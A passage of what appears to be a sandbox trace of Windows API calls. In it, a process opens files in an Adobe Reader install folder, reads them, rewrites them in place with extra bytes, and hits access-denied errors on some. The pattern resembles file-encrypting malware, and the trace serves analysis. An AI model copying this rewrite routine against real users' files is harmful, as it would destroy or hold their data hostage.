lpUsedDefaultChar=0x0) returned 32 [0096.420] ReadFile (in: hFile=0x1d8, lpBuffer=0x2695708, nNumberOfBytesToRead=0x338, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695708*, lpNumberOfBytesRead=0x331f2bc*=0x338, lpOverlapped=0x0) returned 1 [0096.423] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0096.423] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x331f2d0*=0x8c0, lpOverlapped=0x0) returned 1 [0096.424] CloseHandle (hObject=0x1d8) returned 1 [0096.424] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCT.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmect.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.425] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.425] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3fa1 [0096.425] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.425] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.425] ReleaseMutex (hMutex=0x168) returned 1 [0096.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeCT.htm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeCT.htm", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeCT.htm", lpUsedDefaultChar=0x0) returned 12 [0096.425] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.428] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2fa1 [0096.429] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.453] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2fa1 [0096.453] WriteFile (in: hFile=0x1d8, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.454] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0096.454] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.454] CloseHandle (hObject=0x1d8) returned 1 [0096.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerus.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.455] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.455] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x4872 [0096.455] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.455] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.455] ReleaseMutex (hMutex=0x168) returned 1 [0096.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeRUS.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeRUS.htm", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeRUS.htm", lpUsedDefaultChar=0x0) returned 13 [0096.456] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.808] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3872 [0096.808] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.842] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3872 [0096.843] WriteFile (in: hFile=0x1d8, lpBuffer=0x2870988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.843] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0096.843] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0096.843] CloseHandle (hObject=0x1d8) returned 1 [0096.844] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeSongStd-Light.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobesongstd-light.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0096.844] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.844] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xedd564 [0096.844] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0096.845] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.845] ReleaseMutex (hMutex=0x168) returned 1 [0096.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeSongStd-Light.otf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0096.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeSongStd-Light.otf", cchWideChar=22, lpMultiByteStr=0x1f88b2c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeSongStd-Light.otf", lpUsedDefaultChar=0x0) returned 22 [0096.845] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.863] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.915] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.935] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.947] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.949] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.951] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef20000 [0096.959] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0096.969] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x331f23c, dwLength=0x1c | out: lpBuffer=0x331f23c*(BaseAddress=0x7ef80000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x6000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0096.969] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eea0000 [0096.982] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.986] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0xf000, lpOverlapped=0x0) returned 1 [0097.000] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0097.325] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x331f23c, dwLength=0x1c | out: lpBuffer=0x331f23c*(BaseAddress=0x7ef20000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x66000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0097.326] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef20000 [0097.326] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef20000 [0097.327] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xedb564 [0097.327] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x331f278*=0x2000, lpOverlapped=0x0) returned 1 [0097.329] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0xedb564 [0097.334] VirtualQuery (in: lpAddress=0x7eea0000, lpBuffer=0x331f2b0, dwLength=0x1c | out: lpBuffer=0x331f2b0*(BaseAddress=0x7eea0000, AllocationBase=0x7eea0000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0097.334] VirtualFree (lpAddress=0x7eea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.337] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x331f2b0, dwLength=0x1c | out: lpBuffer=0x331f2b0*(BaseAddress=0x7ef20000, AllocationBase=0x7ef20000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0097.337] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.338] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x331f28c*=0x2588, lpOverlapped=0x0) returned 1 [0097.338] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0097.338] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.339] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.339] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.339] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.340] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.340] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.340] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.341] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.341] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0097.341] CloseHandle (hObject=0x1d8) returned 1 [0097.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.405] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V", lpFilePart=0x331f690*="90msp-RKSJ-V") returned 0x43 [0097.405] GetLastError () returned 0x5 [0097.405] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.405] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.405] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.405] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.405] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.406] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.406] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-v")) returned 0x20 [0097.406] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2", lpFilePart=0x331f690*="Adobe-CNS1-2") returned 0x43 [0097.406] GetLastError () returned 0x5 [0097.406] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.406] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.406] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.406] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.407] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.407] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.407] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-2")) returned 0x20 [0097.407] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-mac"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.407] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac", lpFilePart=0x331f690*="Adobe-CNS1-H-Mac") returned 0x47 [0097.407] GetLastError () returned 0x5 [0097.407] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.408] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.408] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.408] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.408] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.408] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.408] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-mac")) returned 0x20 [0097.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbk-euc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.408] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC", lpFilePart=0x331f690*="Adobe-GB1-GBK-EUC") returned 0x48 [0097.409] GetLastError () returned 0x5 [0097.409] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.409] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.409] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.409] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.409] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.409] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.409] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-GBK-EUC" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-gbk-euc")) returned 0x20 [0097.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.410] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2", lpFilePart=0x331f690*="Adobe-Japan1-2") returned 0x45 [0097.410] GetLastError () returned 0x5 [0097.410] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.410] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.410] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.410] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.410] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.410] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.410] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-2")) returned 0x20 [0097.411] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 